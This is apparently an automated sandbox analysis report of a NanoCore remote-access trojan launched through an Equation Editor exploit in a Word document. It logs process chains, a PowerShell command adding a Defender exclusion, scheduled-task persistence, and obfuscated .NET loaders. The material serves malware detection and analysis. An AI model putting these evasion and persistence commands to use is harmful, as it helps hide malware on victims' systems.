      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............T.......D.......+.......................0......._.......8...............H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............T.......D.......S.......................0.......k.......................H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............T.......D.......n.......................0.......k.......8...............................
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......8.......2.......H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............T.......D...............................0.......w.......8...............H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............T.......D...............................0.......................l.......H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............T.......D...............................0...............8...............................
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............T.......D...............................0...............8...............H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............T.......D.......9.......................0...............8...............H.1.............
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.....................\.......e.................................................................".....
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................%...............%.....(.P.............$.......@...............................................................................
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................ .......................(.P.....p.......................|.......................................................................
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe C:\Users\user\AppData\Roaming\plugmancdht5461.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp
      Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0
      Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe C:\Users\user\AppData\Roaming\plugmancdht5461.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE3AA.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{910523a1-2f72-4f3f-a340-f1a8b5f90deb}
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMutant created: \Sessions\1\BaseNamedObjects\bigbkIthbt
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: smtpsvc.exe, smtpsvc.exe, 00000013.00000002.463928971.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe, 00000013.00000000.461835651.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe.9.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00FC5B04 push ecx; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005932B7 push cs; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A410E push es; retn 0000h
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A410E push es; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A3DFF push es; ret
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BC400 push esp; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BA481 push 8B6DBE42h; iretd
      Source: initial sampleStatic PE information: section name: .text entropy: 7.85251409286
      Source: initial sampleStatic PE information: section name: .text entropy: 7.85251409286
      Source: initial sampleStatic PE information: section name: .text entropy: 7.85251409286
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
